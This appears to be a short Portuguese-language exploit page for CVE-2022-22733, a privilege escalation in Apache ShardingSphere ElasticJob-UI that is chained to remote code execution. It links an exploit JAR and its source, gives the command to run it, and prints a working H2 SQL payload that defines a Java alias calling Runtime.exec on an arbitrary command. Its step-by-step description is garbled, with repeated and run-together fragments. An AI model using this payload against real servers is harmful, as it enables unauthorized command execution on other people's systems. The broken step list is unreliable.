
Apache ShardingSphere ElasticJob-UI Escalação de Privilégios & Exploit de RCE
CVE-2022-22733 é uma vulnerabilidade que afeta o Apache ShardingSphere ElasticJob-UI 3.0.0 e versões anteriores. A vulnerabilidade leva à Escalação de Privilégios. Porém, abusando dos privilégios escalados, um ataque JDBC pode ser executado e alcançar RCE. Você pode ler a análise da vulnerabilidade Aqui e o blog de escrita do exploit passo a passo Aqui.

O Exploit funciona da seguinte forma:
accessToken gerado de forma insegura.accessToken gerado de forma insegura.accessToken.root dos dados analisados.root e obtenha privilégios totais na aplicação.Você pode baixar o arquivo JAR aqui e o código fonte aqui.
jar:java -jar CVE-2022-22733.jar
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}';CALL EXEC ('your_command_here')
